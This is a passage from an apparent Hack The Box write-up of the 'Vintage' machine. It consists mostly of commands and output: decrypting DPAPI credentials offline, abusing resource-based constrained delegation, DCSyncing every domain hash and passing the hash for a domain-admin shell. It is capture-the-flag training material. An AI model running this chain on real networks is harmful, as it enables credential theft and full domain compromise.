My first thought is to use RunasCs.exe to get an interactive logon, but it fails even with the PowerShell script due to AV

Now I will try to get the key and credentials offline and try to decrypt

I’ll need the master key, information about the account, and the encrypted credential. The master key is helped in AppData\\Roaming\\Microsoft\\Protect\\[sid]:

*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> ls -force

    Directory: C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   1:17 PM            740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs-          6/7/2024   1:17 PM            740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-a-hs-          6/7/2024   1:17 PM            904 BK-VINTAGE
-a-hs-          6/7/2024   1:17 PM             24 Preferred

There’s two files there that could be the master key. Trying to download either with Evil-WinRM fails:

*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> download 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
                                        
Info: Downloading C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115\\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 to 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
                                        
Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError
                                                                                                                                                                                                                                                                              
          rescue EstandardError => err                                                                                                                                                                                                                                        
                 ^^^^^^^^^^^^^^                                                                                                                                                                                                                                               
Did you mean?  StandardError   

I’ll just base64-encode them:

*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115\\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847'))
AgAAAAAAAAAAAAAANABkAGIAZgAwADQAZAA4AC0ANQAyADkAYgAtADQAYgA0AGMALQBiADQAYQBlAC0AOABlADgANwA1AGUANABmAGUAOAA0ADcAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA2or8mZsV0QcGzC0XUJ9K8FBGAAAJgAAAA2YAAJhSpSk/CQYorLpjFuO6lxoHg+a9CGghh0pqkMYfO5Irop3dQGYbS2b3KJo0qLO586XfAvV/0dK/fM8a4erXENVlgtsrHRG48O/VO0Egw0qMZld65hY3jxMWTkzfGqfjNK5ytEtwPHGkAgAAAFiAHjGrO47Qhcn7oxZZBrBQRgAACYAAAANmAABRlZY9IPg0gA9TOU3DaFwm1ylSDyf2HHVE2mTqFzwbK7ZHp2XH8Mx2rvk6EpPUtdIv4kkQU6GsO43Xyg+qcks13CkP8uIIo0ECAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwGUQAxdTpQrS3sEc8gVH9tmXllgaPOCz8cyowsRu8fkbCLFyIcsLVGKHQRv3PUJ1qmSeC604xcQlXI43XddWfFZ3tFF1yLQOSNwfbKDdGQiF3yTlYb6KoMvhQXzs1O1LLP2cUEFOGw8+Pg8uMN4KDBURRWfqmRksyn38bg3OKFSQ1K0CpdNzKfPvS6TnGuvHvnglzZdT5qwQ+nOdXFuJccenatjtlVgQNdp6yZOmpQjrkTtZOxz9b0JRsoOQS0NWu7WThQU4s8yeZkHaJRSJ5lohgdYpZiLJ4x1lG5jLz7/IX5pP6UK1cq5KwLjvaMdGsK9GDj3ofoB/OldTS7StCAXHfzvgjmTscAdxSARKV8ekuDWjsXgz7iZkV04lUG5Jo2FD9xrFdY1DqTSbr7oLdHAwzFBQX5RGnDhKFJXA0KJ29sz1zHGVn4/J4k0e/Hkop6YwRfEighbU=
*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115\\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'))
AgAAAAAAAAAAAAAAOQA5AGMAZgA0ADEAYQAzAC0AYQA1ADUAMgAtADQAYwBmADcALQBhADgAZAA3AC0AYQBjAGEAMgBkADYAZgA3ADMAMwA5AGIAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA6o788ZIMNhaSpbkSX0mC01BGAAAJgAAAA2YAABAM9ZX6Z/40RYL/aC+dw/D5oa7WMYBN56zwgXYX4QrAIb4DtJoM27zWgMxygJ36SpSHHHQGJMgTs6nZN5U/1q7DBIpQlsWk15jpmUFS2czCScuP9C+dGdYT+p6AWb3L7PZUPqNDHqZRAgAAALFxHXdcOeYbfN6CsYeVaYZQRgAACYAAAANmAABiEtEJeAVpg4QA0lnUzAsf6koPtccl1os9yZrj1gTAc/oSmhBNPEE3/VVVPZw9g3NP26Wj3vO36IOmtsXWYABkukmijrSaAZUCAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwr2BFf0a0DhdM8JymBww6mzQt8tVsTbDmCZ/uZu3bzOAOUXODaGaJOOKqRm2W8rHPOZ27YjtD1pd0MFJDocNJwdhN5pwTdz2v2JsrVVVE363zZjXHeXefhuL5AMwMQr6gpTsCGcxrd1ziTN9Q1lH9QtnYE7OZlbrZPhiWO2vvdX+UQcKlgpxcSGLaczL53/UJXrvt9hueRn+YXxnK+fiyZ0gmjMlP+yuxOiKSvHM/UT6NmuYewnApQrOBO3A5F1XKHguHKT+VS187uBu/TO1ZT4/CrsKws1aG7EkIXhRKzEgukAwn5nZlU6YaADdeQRDzCR1D0ycJKFyZd4QE1Nt6Kbgr+ukbiurwBJd/D1a3+WWCw+S2OJVHB9qqlcW11heJd+v9eGe1Wf6/PYCvyyWMsvusF8XUswgKQbkH821vscyNmJWDwMply/ZvellKuGQ1/s5gVqUkALQ=

I’ll do the same with the credential file:

*Evil-WinRM* PS C:\\users\\c.neri\\appdata\\Roaming\\Microsoft\\Protect\\S-1-5-21-4024337825-2033394866-2055507597-1115> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\\users\\c.neri\\appdata\\roaming\\microsoft\\credentials\\C4BB96844A5C9DD45D5B6A9859252BA6'))     
AQAAAKIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vczmwAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAANlsnh9uZhRwM1xc/8CNBwwAAAAABIAAAKAAAAAQAAAAK+zRTF7v+bPA1UScG2CL4uAAAABoyaUl8s/1J1TabkeZkP1VvjzlbcQ61ojdLQpks7Q0/irEKMmlFOJ/Za2o8akFz3kS28HEeNGkg/3kGNOvhVbnZ2NJQHTJ12SgjFuAuPhdS9Ob2CvqW9xu7pDGXPt5AHKqlqRy+fajjcEYkGP0ki6sLBF/rpFnQvRQ9hCg8iVqyq3BpSdwOZ1h0Zxh8mbvDPv+XHw9+o6DabZifdfj+GuMRi+GDNLvv8orYUqHZ6hHO3vB4kDu5T4G8QsIAtULBs3V2ww1G7xdGI57BGKi4LEk6kuaEWopsCflsc5FK4a4xBQAAABSjIrXKMIH3qbzDSrnPMUzCyhkAA==

For each of these three, I’ll paste the base64, decode it, and save it as a file on my host.

└─$ echo "AgAAAAAAAAAAAAAANABkAGIAZgAwADQAZAA4AC0ANQAyADkAYgAtADQAYgA0AGMALQBiADQAYQBlAC0AOABlADgANwA1AGUANABmAGUAOAA0ADcAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA2or8mZsV0QcGzC0XUJ9K8FBGAAAJgAAAA2YAAJhSpSk/CQYorLpjFuO6lxoHg+a9CGghh0pqkMYfO5Irop3dQGYbS2b3KJo0qLO586XfAvV/0dK/fM8a4erXENVlgtsrHRG48O/VO0Egw0qMZld65hY3jxMWTkzfGqfjNK5ytEtwPHGkAgAAAFiAHjGrO47Qhcn7oxZZBrBQRgAACYAAAANmAABRlZY9IPg0gA9TOU3DaFwm1ylSDyf2HHVE2mTqFzwbK7ZHp2XH8Mx2rvk6EpPUtdIv4kkQU6GsO43Xyg+qcks13CkP8uIIo0ECAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwGUQAxdTpQrS3sEc8gVH9tmXllgaPOCz8cyowsRu8fkbCLFyIcsLVGKHQRv3PUJ1qmSeC604xcQlXI43XddWfFZ3tFF1yLQOSNwfbKDdGQiF3yTlYb6KoMvhQXzs1O1LLP2cUEFOGw8+Pg8uMN4KDBURRWfqmRksyn38bg3OKFSQ1K0CpdNzKfPvS6TnGuvHvnglzZdT5qwQ+nOdXFuJccenatjtlVgQNdp6yZOmpQjrkTtZOxz9b0JRsoOQS0NWu7WThQU4s8yeZkHaJRSJ5lohgdYpZiLJ4x1lG5jLz7/IX5pP6UK1cq5KwLjvaMdGsK9GDj3ofoB/OldTS7StCAXHfzvgjmTscAdxSARKV8ekuDWjsXgz7iZkV04lUG5Jo2FD9xrFdY1DqTSbr7oLdHAwzFBQX5RGnDhKFJXA0KJ29sz1zHGVn4/J4k0e/Hkop6YwRfEighbU=" | base64 -d > 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ echo "AgAAAAAAAAAAAAAAOQA5AGMAZgA0ADEAYQAzAC0AYQA1ADUAMgAtADQAYwBmADcALQBhADgAZAA3AC0AYQBjAGEAMgBkADYAZgA3ADMAMwA5AGIAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAA6o788ZIMNhaSpbkSX0mC01BGAAAJgAAAA2YAABAM9ZX6Z/40RYL/aC+dw/D5oa7WMYBN56zwgXYX4QrAIb4DtJoM27zWgMxygJ36SpSHHHQGJMgTs6nZN5U/1q7DBIpQlsWk15jpmUFS2czCScuP9C+dGdYT+p6AWb3L7PZUPqNDHqZRAgAAALFxHXdcOeYbfN6CsYeVaYZQRgAACYAAAANmAABiEtEJeAVpg4QA0lnUzAsf6koPtccl1os9yZrj1gTAc/oSmhBNPEE3/VVVPZw9g3NP26Wj3vO36IOmtsXWYABkukmijrSaAZUCAAAAAAEAAFgAAACn2p9w/uXURbRTVVUG8NTwr2BFf0a0DhdM8JymBww6mzQt8tVsTbDmCZ/uZu3bzOAOUXODaGaJOOKqRm2W8rHPOZ27YjtD1pd0MFJDocNJwdhN5pwTdz2v2JsrVVVE363zZjXHeXefhuL5AMwMQr6gpTsCGcxrd1ziTN9Q1lH9QtnYE7OZlbrZPhiWO2vvdX+UQcKlgpxcSGLaczL53/UJXrvt9hueRn+YXxnK+fiyZ0gmjMlP+yuxOiKSvHM/UT6NmuYewnApQrOBO3A5F1XKHguHKT+VS187uBu/TO1ZT4/CrsKws1aG7EkIXhRKzEgukAwn5nZlU6YaADdeQRDzCR1D0ycJKFyZd4QE1Nt6Kbgr+ukbiurwBJd/D1a3+WWCw+S2OJVHB9qqlcW11heJd+v9eGe1Wf6/PYCvyyWMsvusF8XUswgKQbkH821vscyNmJWDwMply/ZvellKuGQ1/s5gVqUkALQ=" | base64 -d > 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ echo "AQAAAKIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAo0HPmVKl90yo16yi1vczmwAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAANlsnh9uZhRwM1xc/8CNBwwAAAAABIAAAKAAAAAQAAAAK+zRTF7v+bPA1UScG2CL4uAAAABoyaUl8s/1J1TabkeZkP1VvjzlbcQ61ojdLQpks7Q0/irEKMmlFOJ/Za2o8akFz3kS28HEeNGkg/3kGNOvhVbnZ2NJQHTJ12SgjFuAuPhdS9Ob2CvqW9xu7pDGXPt5AHKqlqRy+fajjcEYkGP0ki6sLBF/rpFnQvRQ9hCg8iVqyq3BpSdwOZ1h0Zxh8mbvDPv+XHw9+o6DabZifdfj+GuMRi+GDNLvv8orYUqHZ6hHO3vB4kDu5T4G8QsIAtULBs3V2ww1G7xdGI57BGKi4LEk6kuaEWopsCflsc5FK4a4xBQAAABSjIrXKMIH3qbzDSrnPMUzCyhkAA==" | base64 -d > C4BB96844A5C9DD45D5B6A9859252BA6

the second key worked

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne                                                            
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0x55d51b40d9aa74e8cdc44a6d24a25c96451449229739a1c9dd2bb50048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ERROR: Padding is incorrect.
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : vintage\\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312

Let’s try to authenticate c.neri_adm

└─$  netexec smb dc01.vintage.htb -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 

RBCD

C.NERI_ADM@VINTAGE.HTB -> MemberOf -> DELEGATEDADMINS@VINTAGE.HTB -> AllowedToAct -> DC01.VINTAGE.HTB

To pull of this attack, I’ll need a compromised account with a service principal name (SPN). C.Neri_adm does not have one, and I don’t have permissions to add one. But, FS01$ does, and C.Neri_adm has GenericWrite over DelegatedAdmins, which means they can add accounts to the group. From there, I can have the FS01$ account request a ticket on behalf of any account. There are many ways to exploit this. I’ll get a CIFS ticket as the DC01$ computer account and use that to dump the hashes for the domain.

Add FS01$ to DelegatedAdmins

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-getTGT vintage.htb/'C.Neri_adm':'Uncr4ck4bl3P4ssW0rd0312' -dc-ip 10.10.11.45
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in C.Neri_adm.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=C.Neri_adm.ccache 

└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb  -k add groupMember DelegatedAdmins 'fs01$' 
[+] fs01$ added to DelegatedAdmins

Get DC01$ ST

I’ll make a new ticket as FS01$: (on new terminal)

└─$ kinit 'fs01$@VINTAGE.HTB'
Password for fs01$@VINTAGE.HTB: 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ klist                    
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB

Valid starting     Expires            Service principal
07/26/25 00:45:31  07/26/25 10:45:31  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 07/27/25 00:45:28
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/fs01$:fs01' -dc-ip dc01.vintage.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

Now we can DCSYNC

└─$ impacket-secretsdump vintage.htb/'dc01$'@dc01.vintage.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:5008d30496b4c5069ce1fc187b5b5960:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5f22c4cf44bc5277d90b8e281b9ba3735636bd95a72f3870ae3de93513ce63c5
Administrator:aes128-cts-hmac-sha1-96:c119630313138df8cd2e98b5e2d018f7
Administrator:des-cbc-md5:c4d5072368c27fba
krbtgt:aes256-cts-hmac-sha1-96:8d969dafdd00d594adfc782f13ababebbada96751ec4096bce85e122912ce1f0
krbtgt:aes128-cts-hmac-sha1-96:3c7375304a46526c00b9a7c341699bc0
krbtgt:des-cbc-md5:e923e308752658df
M.Rossi:aes256-cts-hmac-sha1-96:14d4ea3f6cd908d23889e816cd8afa85aa6f398091aa1ab0d5cd1710e48637e6
M.Rossi:aes128-cts-hmac-sha1-96:3f974cd6254cb7808040db9e57f7e8b4
M.Rossi:des-cbc-md5:7f2c7c982cd64361
R.Verdi:aes256-cts-hmac-sha1-96:c3e84a0d7b3234160e092f168ae2a19366465d0a4eab1e38065e79b99582ea31
R.Verdi:aes128-cts-hmac-sha1-96:d146fa335a9a7d2199f0dd969c0603fb
R.Verdi:des-cbc-md5:34464a58618f8938
L.Bianchi:aes256-cts-hmac-sha1-96:abcbbd86203a64f177288ed73737db05718cead35edebd26740147bd73e9cfed
L.Bianchi:aes128-cts-hmac-sha1-96:92067d46b54cdb11b4e9a7e650beb122
L.Bianchi:des-cbc-md5:01f2d667a19bce25
G.Viola:aes256-cts-hmac-sha1-96:f3b3398a6cae16ec640018a13a1e70fc38929cfe4f930e03b1c6f1081901844a
G.Viola:aes128-cts-hmac-sha1-96:367a8af99390ebd9f05067ea4da6a73b
G.Viola:des-cbc-md5:7f19b9cde5dce367
C.Neri:aes256-cts-hmac-sha1-96:c8b4d30ca7a9541bdbeeba0079f3a9383b127c8abf938de10d33d3d7c3b0fd06
C.Neri:aes128-cts-hmac-sha1-96:0f922f4956476de10f59561106aba118
C.Neri:des-cbc-md5:9da708a462b9732f
P.Rosa:aes256-cts-hmac-sha1-96:f9c16db419c9d4cb6ec6242484a522f55fc891d2ff943fc70c156a1fab1ebdb1
P.Rosa:aes128-cts-hmac-sha1-96:1cdedaa6c2d42fe2771f8f3f1a1e250a
P.Rosa:des-cbc-md5:a423fe64579dae73
svc_sql:aes256-cts-hmac-sha1-96:3bc255d2549199bbed7d8e670f63ee395cf3429b8080e8067eeea0b6fc9941ae
svc_sql:aes128-cts-hmac-sha1-96:bf4c77d9591294b218b8280c7235c684
svc_sql:des-cbc-md5:2ff4022a68a7834a
svc_ldap:aes256-cts-hmac-sha1-96:d5cb431d39efdda93b6dbcf9ce2dfeffb27bd15d60ebf0d21cd55daac4a374f2
svc_ldap:aes128-cts-hmac-sha1-96:cfc747dd455186dba6a67a2a340236ad
svc_ldap:des-cbc-md5:e3c48675a4671c04
svc_ark:aes256-cts-hmac-sha1-96:820c3471b64d94598ca48223f4a2ebc2491c0842a84fe964a07e4ee29f63d181
svc_ark:aes128-cts-hmac-sha1-96:55aec332255b6da8c1344357457ee717
svc_ark:des-cbc-md5:6e2c9b15bcec6e25
C.Neri_adm:aes256-cts-hmac-sha1-96:96072929a1b054f5616e3e0d0edb6abf426b4a471cce18809b65559598d722ff
C.Neri_adm:aes128-cts-hmac-sha1-96:ed3b9d69e24d84af130bdc133e517af0
C.Neri_adm:des-cbc-md5:5d6e9dd675042fa7
L.Bianchi_adm:aes256-cts-hmac-sha1-96:529fa80540d759052c6beb161d5982435a37811b3ad2a338e81b75797c11959e
L.Bianchi_adm:aes128-cts-hmac-sha1-96:7e4599a7f84c2868e20141bdc8608bd7
L.Bianchi_adm:des-cbc-md5:8fa746971a98fedf
DC01$:aes256-cts-hmac-sha1-96:f8ceb2e0ea58bf929e6473df75802ec8efcca13135edb999fcad20430dc06d4b
DC01$:aes128-cts-hmac-sha1-96:a8f037cb02f93e9b779a84441be1606a
DC01$:des-cbc-md5:c4f15ef8c4f43134
gMSA01$:aes256-cts-hmac-sha1-96:39847e723bd576449a295d008d66ae0bbf09610a1f14fedef69a93f2c0ba0024
gMSA01$:aes128-cts-hmac-sha1-96:49bcbd0a324fe0ec583ec07a29b2d3c1
gMSA01$:des-cbc-md5:2aef79763b76eff8
FS01$:aes256-cts-hmac-sha1-96:d57d94936002c8725eab5488773cf2bae32328e1ba7ffcfa15b81d4efab4bb02
FS01$:aes128-cts-hmac-sha1-96:ddf2a2dcc7a6080ea3aafbdf277f4958
FS01$:des-cbc-md5:dafb3738389e205b
[*] Cleaning up... 

Now we can auth as adminsitrator

─$ impacket-getTGT vintage.htb/administrator@dc01.vintage.htb -hashes :468c7497513f8243b59980f2240a10de             
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator@dc01.vintage.htb.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=administrator@dc01.vintage.htb.ccache          
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb          
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Invalid token was supplied
Success                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                              
                                 

It fails. That’s because the Administrator account is restricted from logging in. I can see this with netexec:

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ netexec smb dc01.vintage.htb -u Administrator -H 468c7497513f8243b59980f2240a10de -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\Administrator:468c7497513f8243b59980f2240a10de STATUS_LOGON_TYPE_NOT_GRANTED 

The Domain Admins group has two users in it:

I’ll try the same thing with L.Bianchi_adm:

we are in

─$ impacket-getTGT  vintage.htb/L.Bianchi_adm@dc01.vintage.htb -hashes :6b751449807e0d73065b0423b64687f0
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in L.Bianchi_adm@dc01.vintage.htb.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=L.Bianchi_adm@dc01.vintage.htb.ccache 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb          
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\L.Bianchi_adm\\Documents> 

and we found root.txt

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> dir

    Directory: C:\\Users\\Administrator\\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/25/2025   3:36 PM             34 root.txt

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>